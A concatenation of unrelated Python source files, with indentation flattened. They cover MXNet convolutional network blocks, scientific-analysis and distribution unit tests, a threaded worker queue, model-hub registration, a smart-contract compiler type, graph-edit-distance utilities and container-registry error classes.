data=data, num_filter=num_filter, kernel=kernel, stride=stride, pad=pad, no_bias=True, workspace=workspace, name=name+'_conv')
else:
conv_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = data,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=data, offset=conv_offset,
num_filter=num_filter, pad=(1,1), kernel=(3,3), num_deformable_group=1, stride=stride, dilate=(1, 1), no_bias=False)
bn = mx.symbol.BatchNorm(data=conv, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name+'_bn')
if with_act:
act = Act(bn, act_type, name=name+'_relu')
#act = mx.symbol.Activation(
# data=bn, act_type=act_type, attr=mirror_attr, name=name+'_relu')
return act
else:
return bn
def conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution(data=act1, num_filter=int(num_filter*0.5), kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
conv2 = Conv(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution(data=act2, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
conv3 = Conv(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0), no_bias=True,
workspace=workspace, name=name + '_conv3')
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution(data=act3, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
#if binarize:
# conv3 = mx.sym.BatchNorm(data=conv3, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
shortcut = mx.sym.QConvolution(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv3 + shortcut
def conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilation, **kwargs):
bit = 1
ACT_BIT = config.ACT_BIT
bn_mom = config.bn_mom
workspace = config.workspace
memonger = config.memonger
#print('in unit2')
# the same as https://github.com/facebook/fb.resnet.torch#notes, a bit difference with origin paper
bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn1')
if not binarize:
act1 = Act(data=bn1, act_type='relu', name=name + '_relu1')
if not dcn:
conv1 = Conv(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv1')
else:
conv1_offset = mx.symbol.Convolution(name=name+'_conv1_offset', data = act1,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv1 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv1', data=act1, offset=conv1_offset,
num_filter=int(num_filter*0.5), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act1 = mx.sym.QActivation(data=bn1, act_bit=ACT_BIT, name=name + '_relu1', backward_only=True)
conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=int(num_filter*0.5), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv1', act_bit=ACT_BIT, weight_bit=bit)
bn2 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn2')
if not binarize:
act2 = Act(data=bn2, act_type='relu', name=name + '_relu2')
if not dcn:
conv2 = Conv(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv2')
else:
conv2_offset = mx.symbol.Convolution(name=name+'_conv2_offset', data = act2,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv2 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv2', data=act2, offset=conv2_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act2 = mx.sym.QActivation(data=bn2, act_bit=ACT_BIT, name=name + '_relu2', backward_only=True)
conv2 = mx.sym.QConvolution_v1(data=act2, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv2', act_bit=ACT_BIT, weight_bit=bit)
bn3 = mx.sym.BatchNorm(data=conv2, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn3')
if not binarize:
act3 = Act(data=bn3, act_type='relu', name=name + '_relu3')
if not dcn:
conv3 = Conv(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(dilation,dilation), dilate=(dilation,dilation),
no_bias=True, workspace=workspace, name=name + '_conv3')
else:
conv3_offset = mx.symbol.Convolution(name=name+'_conv3_offset', data = act3,
num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
conv3 = mx.contrib.symbol.DeformableConvolution(name=name+'_conv3', data=act3, offset=conv3_offset,
num_filter=int(num_filter*0.25), pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=True)
else:
act3 = mx.sym.QActivation(data=bn3, act_bit=ACT_BIT, name=name + '_relu3', backward_only=True)
conv3 = mx.sym.QConvolution_v1(data=act3, num_filter=int(num_filter*0.25), kernel=(3,3), stride=(1,1), pad=(1,1),
no_bias=True, workspace=workspace, name=name + '_conv3', act_bit=ACT_BIT, weight_bit=bit)
conv4 = mx.symbol.Concat(*[conv1, conv2, conv3])
if binarize:
conv4 = mx.sym.BatchNorm(data=conv4, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_bn4')
if dim_match:
shortcut = data
else:
if not binarize:
shortcut = Conv(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, no_bias=True,
workspace=workspace, name=name+'_sc')
else:
#assert(False)
shortcut = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=stride, pad=(0,0),
no_bias=True, workspace=workspace, name=name + '_sc', act_bit=ACT_BIT, weight_bit=bit)
shortcut = mx.sym.BatchNorm(data=shortcut, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=name + '_sc_bn')
if memonger:
shortcut._set_attr(mirror_stage='True')
return conv4 + shortcut
#return bn4 + shortcut
#return act4 + shortcut
def block17(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
tower_conv = ConvFactory(net, 192, (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, 129, (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, 160, (1, 7), pad=(1, 2), name=name+'_conv1_1')
tower_conv1_2 = ConvFactory(tower_conv1_1, 192, (7, 1), pad=(2, 1), name=name+'_conv1_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def block35(net, input_num_channels, scale=1.0, with_act=True, act_type='relu', mirror_attr={}, name=''):
M = 1.0
tower_conv = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv')
tower_conv1_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv1_0')
tower_conv1_1 = ConvFactory(tower_conv1_0, int(input_num_channels*0.25*M), (3, 3), pad=(1, 1), name=name+'_conv1_1')
tower_conv2_0 = ConvFactory(net, int(input_num_channels*0.25*M), (1, 1), name=name+'_conv2_0')
tower_conv2_1 = ConvFactory(tower_conv2_0, int(input_num_channels*0.375*M), (3, 3), pad=(1, 1), name=name+'_conv2_1')
tower_conv2_2 = ConvFactory(tower_conv2_1, int(input_num_channels*0.5*M), (3, 3), pad=(1, 1), name=name+'_conv2_2')
tower_mixed = mx.symbol.Concat(*[tower_conv, tower_conv1_1, tower_conv2_2])
tower_out = ConvFactory(
tower_mixed, input_num_channels, (1, 1), with_act=False, name=name+'_conv_out')
net = net+scale * tower_out
if with_act:
act = mx.symbol.Activation(
data=net, act_type=act_type, attr=mirror_attr)
return act
else:
return net
def conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
assert not binarize
if stride[0]>1 or not dim_match:
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
conv4 = block35(data, num_filter, name=name+'_block35')
return conv4
def conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs):
workspace = config.workspace
if stride[0]>1 or not dim_match:
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate, **kwargs)
cab = CAB(data, num_filter, 1, 4, workspace, name, dilate, 1)
return cab.get()
def conv_block(data, num_filter, stride, dim_match, name, binarize, dcn, dilate):
if config.net_block=='resnet':
return conv_resnet(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='inception':
return conv_inception(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='hpm':
return conv_hpm(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
elif config.net_block=='cab':
return conv_cab(data, num_filter, stride, dim_match, name, binarize, dcn, dilate)
#def lin(data, num_filter, workspace, name, binarize, dcn):
# bit = 1
# ACT_BIT = config.ACT_BIT
# bn_mom = config.bn_mom
# workspace = config.workspace
# if not binarize:
# if not dcn:
# conv1 = Conv(data=data, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv')
# bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# return act1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1_offset = mx.symbol.Convolution(name=name+'_conv_offset', data = act1,
# num_filter=18, pad=(1, 1), kernel=(3, 3), stride=(1, 1))
# conv1 = mx.contrib.symbol.DeformableConvolution(name=name+"_conv", data=act1, offset=conv1_offset,
# num_filter=num_filter, pad=(1,1), kernel=(3, 3), num_deformable_group=1, stride=(1, 1), dilate=(1, 1), no_bias=False)
# #conv1 = Conv(data=act1, num_filter=num_filter, kernel=(3,3), stride=(1,1), pad=(1,1),
# # no_bias=False, workspace=workspace, name=name + '_conv')
# return conv1
# else:
# bn1 = mx.sym.BatchNorm(data=data, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
# act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
# conv1 = mx.sym.QConvolution_v1(data=act1, num_filter=num_filter, kernel=(1,1), stride=(1,1), pad=(0,0),
# no_bias=True, workspace=workspace, name=name + '_conv', act_bit=ACT_BIT, weight_bit=bit)
# conv1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn2')
# return conv1
def lin3(data, num_filter, workspace, name, k, g=1, d=1):
bn_mom = config.bn_mom
workspace = config.workspace
if k!=3:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=((k-1)//2,(k-1)//2), num_group=g,
no_bias=True, workspace=workspace, name=name + '_conv')
else:
conv1 = Conv(data=data, num_filter=num_filter, kernel=(k,k), stride=(1,1), pad=(d,d), num_group=g, dilate=(d, d),
no_bias=True, workspace=workspace, name=name + '_conv')
bn1 = mx.sym.BatchNorm(data=conv1, fix_gamma=False, momentum=bn_mom, eps=2e-5, name=name + '_bn')
act1 = Act(data=bn1, act_type='relu', name=name + '_relu')
ret = act1
return ret
class CAB:
def __init__(self, data, nFilters, nModules, n, workspace, name, dilate, group):
self.data = data
self.nFilters = nFilters
self.nModules = nModules
self.n = n
self.workspace = workspace
self.name = name
self.dilate = dilate
self.group = group
self.sym_map = {}
def get_output(self, w, h):
key = (w, h)
if key in self.sym_map:
return self.sym_map[key]
ret = None
if h==self.n:
if w==self.n:
ret = (self.data, self.nFilters)
else:
x = self.get_output(w+1, h)
f = int(x[1]*0.5)
if w!=self.n-1:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, 1)
else:
body = lin3(x[0], f, self.workspace, "%s_w%d_h%d_1"%(self.name, w, h), 3, self.group, self.dilate)
ret = (body,f)
else:
x = self.get_output(w+1, h+1)
y = self.get_output(w, h+1)
if h%2==1 and h!=w:
xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
#xbody = xbody+x[0]
else:
xbody = x[0]
#xbody = x[0]
#xbody = lin3(x[0], x[1], self.workspace, "%s_w%d_h%d_2"%(self.name, w, h), 3, x[1])
if w==0:
ybody = lin3(y[0], y[1], self.workspace, "%s_w%d_h%d_3"%(self.name, w, h), 3, self.group)
else:
ybody = y[0]
ybody = mx.sym.concat(y[0], ybody, dim=1)
body = mx.sym.add_n(xbody,ybody, name="%s_w%d_h%d_add"%(self.name, w, h))
body = body/2
ret = (body, x[1])
self.sym_map[key] = ret
return ret
def get(self):
return self.get_output(1, 1)[0]
|
16807
|
import unittest
import pycqed as pq
import os
import matplotlib.pyplot as plt
from pycqed.analysis_v2 import measurement_analysis as ma
class Test_SimpleAnalysis(unittest.TestCase):
@classmethod
def tearDownClass(self):
plt.close('all')
@classmethod
def setUpClass(self):
self.datadir = os.path.join(pq.__path__[0], 'tests', 'test_data')
ma.a_tools.datadir = self.datadir
def test_1D_analysis_multi_file(self):
a = ma.Basic1DAnalysis(t_start='20170726_164507',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_1D_analysis_single_file(self):
# giving only a single file
a = ma.Basic1DAnalysis(t_start='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertEqual(a.timestamps, ['20170726_164845'])
def test_2D_analysis_multi_file(self):
# N.B. by setting x2, x2_label and x2_unit in the options dict
# the values can be plotted versus the varied parameter between
# the linecuts
a = ma.Basic2DAnalysis(t_start='20170726_164521',
t_stop='20170726_164845',
options_dict={'scan_label': 'flipping'})
self.assertTrue(len(a.timestamps) > 5)
def test_2D_interpolated(self):
a=ma.Basic2DInterpolatedAnalysis(t_start='20180522_030206')
fig_keys = list(a.figs.keys())
exp_list_keys = ['Cost function value', 'Conditional phase',
'offset difference']
self.assertEqual(fig_keys, exp_list_keys)
@unittest.skip('FIXME: disabled, see PR #643')
def test_1D_binned_analysis(self):
a=ma.Basic1DBinnedAnalysis(label='120543_Single_qubit_GST_QL')
|
16824
|
import logging
from queue import Queue
from threading import Thread
from time import time
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class Worker(Thread):
def __init__(self, queue, out_que):
Thread.__init__(self)
self.queue = queue
self.out_que = out_que
def run(self):
while True:
# Get the work from the queue and expand the tuple
video, txnId = self.queue.get()
try:
v = video.generate_video_part(txnId)
self.out_que.put(v)
finally:
self.queue.task_done()
def main(video_obj_arr, txnId, n):
ts = time()
# Create a queue to communicate with the worker threads
queue = Queue()
out_que = Queue()
# Create 7 worker threads
for x in range(2):
worker = Worker(queue, out_que)
# Setting daemon to True will let the main thread exit even though the workers are blocking
worker.daemon = True
worker.start()
# Put the tasks into the queue as a tuple
for i in range(1, n):
logger.info('Queueing {}'.format(i))
queue.put((video_obj_arr[i-1], txnId))
# Causes the main thread to wait for the queue to finish processing all the tasks
queue.join()
logging.info('Took %s', time() - ts)
return out_que
if __name__ == '__main__':
main()
|
16833
|
from .expert import UpstreamExpert as _UpstreamExpert
def customized_upstream(*args, **kwargs):
"""
To enable your customized pretrained model, you only need to implement
upstream/example/expert.py and leave this file as is. This file is
used to register the UpstreamExpert in upstream/example/expert.py
The following is a brief introduction of the registration mechanism.
The s3prl/hub.py will collect all the entries registered in this file
(callable variables without the underscore prefix) as a centralized
upstream factory. One can pick up this upstream from the factory via
1.
from s3prl.hub import customized_upstream
model = customized_upstream(ckpt, model_config)
2.
model = torch.hub.load(
'your_s3prl_path',
'customized_upstream',
ckpt,
model_config,
source='local',
)
Our run_downstream.py and downstream/runner.py follows the first usage
"""
return _UpstreamExpert(*args, **kwargs)
|
16837
|
from __future__ import annotations
from typing import Any, Dict, Optional
from boa3.model.method import Method
from boa3.model.property import Property
from boa3.model.type.classes.classarraytype import ClassArrayType
from boa3.model.variable import Variable
class OracleType(ClassArrayType):
"""
A class used to represent Oracle class
"""
def __init__(self):
super().__init__('Oracle')
self._variables: Dict[str, Variable] = {}
self._class_methods: Dict[str, Method] = {}
self._constructor: Method = None
@property
def instance_variables(self) -> Dict[str, Variable]:
return self._variables.copy()
@property
def class_variables(self) -> Dict[str, Variable]:
return {}
@property
def properties(self) -> Dict[str, Property]:
return {}
@property
def static_methods(self) -> Dict[str, Method]:
return {}
@property
def class_methods(self) -> Dict[str, Method]:
# avoid recursive import
from boa3.model.builtin.interop.oracle.oraclegetpricemethod import OracleGetPriceMethod
from boa3.model.builtin.interop.oracle.oraclerequestmethod import OracleRequestMethod
if len(self._class_methods) == 0:
self._class_methods = {
'get_price': OracleGetPriceMethod(),
'request': OracleRequestMethod()
}
return self._class_methods
@property
def instance_methods(self) -> Dict[str, Method]:
return {}
def constructor_method(self) -> Optional[Method]:
return self._constructor
@classmethod
def build(cls, value: Any = None) -> OracleType:
if value is None or cls._is_type_of(value):
return _Oracle
@classmethod
def _is_type_of(cls, value: Any):
return isinstance(value, OracleType)
_Oracle = OracleType()
|
16852
|
from .pspace import (PMatDense, PMatBlockDiag, PMatDiag,
PMatLowRank, PMatImplicit,
PMatKFAC, PMatEKFAC, PMatQuasiDiag)
from .vector import (PVector, FVector)
from .fspace import (FMatDense,)
from .map import (PushForwardDense, PushForwardImplicit,
PullBackDense)
|
16854
|
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
def node_match(n1, n2):
if n1['op'] == n2['op']:
return True
else:
return False
def edge_match(e1, e2):
return True
def gen_graph(adj, ops):
G = nx.DiGraph()
for k, op in enumerate(ops):
G.add_node(k, op=op)
assert adj.shape[0] == adj.shape[1] == len(ops)
for row in range(len(ops)):
for col in range(row + 1, len(ops)):
if adj[row, col] > 0:
G.add_edge(row, col)
return G
def preprocess_adj_op(adj, op):
def counting_trailing_false(l):
count = 0
for TF in l[-1::-1]:
if TF:
break
else:
count += 1
return count
def transform_op(op):
idx2op = {0:'input', 1:'conv1x1-bn-relu', 2:'conv3x3-bn-relu', 3:'maxpool3x3', 4:'output'}
return [idx2op[idx] for idx in op.argmax(axis=1)]
adj = np.array(adj).astype(int)
op = np.array(op).astype(int)
assert op.shape[0] == adj.shape[0] == adj.shape[1]
# find all zero columns
adj_zero_col = counting_trailing_false(adj.any(axis=0))
# find all zero rows
adj_zero_row = counting_trailing_false(adj.any(axis=1))
# find all zero rows
op_zero_row = counting_trailing_false(op.any(axis=1))
assert adj_zero_col == op_zero_row == adj_zero_row - 1, 'Inconsistant result {}={}={}'.format(adj_zero_col, op_zero_row, adj_zero_row - 1)
N = op.shape[0] - adj_zero_col
adj = adj[:N, :N]
op = op[:N]
return adj, transform_op(op)
if __name__ == '__main__':
adj1 = np.array([[0, 1, 1, 1, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op1 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out']
adj2 = np.array([[0, 1, 1, 1, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
op2 = ['in', 'conv1x1', 'mp3x3', 'conv3x3', 'out']
adj3 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 0]])
op3 = ['in', 'conv1x1', 'conv3x3', 'mp3x3', 'out','out2']
adj4 = np.array([[0, 1, 1, 1, 0, 0],
[0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0]])
op4 = np.array([[1, 0, 0, 0, 0],
[0, 1, 0, 0, 0],
[0, 0, 1, 0, 0],
[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 0, 0, 0, 0]])
adj4, op4 = preprocess_adj_op(adj4, op4)
G1 = gen_graph(adj1, op1)
G2 = gen_graph(adj2, op2)
G3 = gen_graph(adj3, op3)
G4 = gen_graph(adj4, op4)
plt.subplot(141)
nx.draw(G1, with_labels=True, font_weight='bold')
plt.subplot(142)
nx.draw(G2, with_labels=True, font_weight='bold')
plt.subplot(143)
nx.draw(G3, with_labels=True, font_weight='bold')
plt.subplot(144)
nx.draw(G4, with_labels=True, font_weight='bold')
nx.graph_edit_distance(G1,G2, node_match=node_match, edge_match=edge_match)
nx.graph_edit_distance(G2,G3, node_match=node_match, edge_match=edge_match)
|
16855
|
import bitmath
class V2RegistryException(Exception):
def __init__(
self,
error_code_str,
message,
detail,
http_status_code=400,
repository=None,
scopes=None,
is_read_only=False,
):
super(V2RegistryException, self).__init__(message)
self.http_status_code = http_status_code
self.repository = repository
self.scopes = scopes
self.is_read_only = is_read_only
self._error_code_str = error_code_str
self._detail = detail
def as_dict(self):
error_dict = {
"code": self._error_code_str,
"message": str(self),
"detail": self._detail if self._detail is not None else {},
}
if self.is_read_only:
error_dict["is_readonly"] = True
return error_dict
class BlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUnknown, self).__init__("BLOB_UNKNOWN", "blob unknown to registry", detail, 404)
class BlobUploadInvalid(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadInvalid, self).__init__(
"BLOB_UPLOAD_INVALID", "blob upload invalid", detail
)
class BlobUploadUnknown(V2RegistryException):
def __init__(self, detail=None):
super(BlobUploadUnknown, self).__init__(
"BLOB_UPLOAD_UNKNOWN", "blob upload unknown to registry", detail, 404
)
class DigestInvalid(V2RegistryException):
def __init__(self, detail=None):
super(DigestInvalid, self).__init__(
"DIGEST_INVALID", "provided digest did not match uploaded content", detail
)
class ManifestBlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestBlobUnknown, self).__init__(
"MANIFEST_BLOB_UNKNOWN", "manifest blob unknown to registry", detail
)
class ManifestInvalid(V2RegistryException):
def __init__(self, detail=None, http_status_code=400):
super(ManifestInvalid, self).__init__(
"MANIFEST_INVALID", "manifest invalid", detail, http_status_code
)
class ManifestUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnknown, self).__init__("MANIFEST_UNKNOWN", "manifest unknown", detail, 404)
class TagExpired(V2RegistryException):
def __init__(self, message=None, detail=None):
super(TagExpired, self).__init__("TAG_EXPIRED", message or "Tag has expired", detail, 404)
class ManifestUnverified(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnverified, self).__init__(
"MANIFEST_UNVERIFIED", "manifest failed signature verification", detail
)
class NameInvalid(V2RegistryException):
def __init__(self, detail=None, message=None):
super(NameInvalid, self).__init__(
"NAME_INVALID", message or "invalid repository name", detail
)
class NameUnknown(V2RegistryException):
def __init__(self, detail=None):
super(NameUnknown, self).__init__(
"NAME_UNKNOWN", "repository name not known to registry", detail, 404
)
class SizeInvalid(V2RegistryException):
def __init__(self, detail=None):
super(SizeInvalid, self).__init__(
"SIZE_INVALID", "provided length did not match content length", detail
)
class TagAlreadyExists(V2RegistryException):
def __init__(self, detail=None):
super(TagAlreadyExists, self).__init__(
"TAG_ALREADY_EXISTS", "tag was already pushed", detail, 409
)
class TagInvalid(V2RegistryException):
def __init__(self, detail=None):
super(TagInvalid, self).__init__("TAG_INVALID", "manifest tag did not match URI", detail)
class LayerTooLarge(V2RegistryException):
def __init__(self, uploaded=None, max_allowed=None):
detail = {}
message = "Uploaded blob is larger than allowed by this registry"
if uploaded is not None and max_allowed is not None:
detail = {
"reason": "%s is greater than maximum allowed size %s" % (uploaded, max_allowed),
"max_allowed": max_allowed,
"uploaded": uploaded,
}
up_str = bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")
max_str = bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")
message = "Uploaded blob of %s is larger than %s allowed by this registry" % (
up_str,
max_str,
)
class Unauthorized(V2RegistryException):
def __init__(self, detail=None, repository=None, scopes=None):
super(Unauthorized, self).__init__(
"UNAUTHORIZED",
"access to the requested resource is not authorized",
detail,
401,
repository=repository,
scopes=scopes,
)
class Unsupported(V2RegistryException):
def __init__(self, detail=None, message=None):
super(Unsupported, self).__init__(
"UNSUPPORTED", message or "The operation is unsupported.", detail, 405
)
class InvalidLogin(V2RegistryException):
def __init__(self, message=None):
super(InvalidLogin, self).__init__(
"UNAUTHORIZED", message or "Specified credentials are invalid", {}, 401
)
class InvalidRequest(V2RegistryException):
def __init__(self, message=None):
super(InvalidRequest, self).__init__(
"INVALID_REQUEST", message or "Invalid request", {}, 400
)
class NamespaceDisabled(V2RegistryException):
def __init__(self, message=None):
message = message or "This namespace is disabled. Please contact your system administrator."
super(NamespaceDisabled, self).__init__("DENIED", message, {}, 405)
class BlobDownloadGeoBlocked(V2RegistryException):
def __init__(self, detail=None):
message = (
"The region from which you are pulling has been geo-ip blocked. "
+ "Please contact the namespace owner."
)
super(BlobDownloadGeoBlocked, self).__init__("DENIED", message, detail, 403)
class ReadOnlyMode(V2RegistryException):
def __init__(self, detail=None):
message = (
"System is currently read-only. Pulls will succeed but all write operations "
+ "are currently suspended."
)
super(ReadOnlyMode, self).__init__("DENIED", message, detail, 405, is_read_only=True)
|
16860
|
import pytest
import numpy as np
import pandas as pd
from xgboost_distribution.distributions import LogNormal
@pytest.fixture
def lognormal():
return LogNormal()
def test_target_validation(lognormal):
valid_target = np.array([0.5, 1, 4, 5, 10])
lognormal.check_target(valid_target)
@pytest.mark.parametrize(
"invalid_target",
[np.array([0, 1.2]), pd.Series([-1.1, 0.4, 2.3])],
)
def test_target_validation_raises(lognormal, invalid_target):
with pytest.raises(ValueError):
lognormal.check_target(invalid_target)
@pytest.mark.parametrize(
"y, params, natural_gradient, expected_grad",
[
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
True,
np.array([[0, 0.5], [1, 0]]),
),
(
np.array([1, 1]),
np.array([[np.log(1), 2], [1, 0]]),
False,
np.array([[0, 1], [1, 0]]),
),
],
)
def test_gradient_calculation(lognormal, y, params, natural_gradient, expected_grad):
grad, hess = lognormal.gradient_and_hessian(
y, params, natural_gradient=natural_gradient
)
np.testing.assert_array_equal(grad, expected_grad)
def test_loss(lognormal):
loss_name, loss_value = lognormal.loss(
# fmt: off
y=np.array([0, ]),
params=np.array([[1, 0], ]),
)
assert loss_name == "LogNormalError"
assert loss_value == np.inf
|
16907
|
import numpy as np
import tectosaur.util.gpu as gpu
from tectosaur.fmm.c2e import build_c2e
import logging
logger = logging.getLogger(__name__)
def make_tree(m, cfg, max_pts_per_cell):
tri_pts = m[0][m[1]]
centers = np.mean(tri_pts, axis = 1)
pt_dist = tri_pts - centers[:,np.newaxis,:]
Rs = np.max(np.linalg.norm(pt_dist, axis = 2), axis = 1)
tree = cfg.traversal_module.Tree.build(centers, Rs, max_pts_per_cell)
return tree
class FMM:
def __init__(self, obs_tree, obs_m, src_tree, src_m, cfg):
self.cfg = cfg
self.obs_tree = obs_tree
self.obs_m = obs_m
self.src_tree = src_tree
self.src_m = src_m
self.gpu_data = dict()
self.setup_interactions()
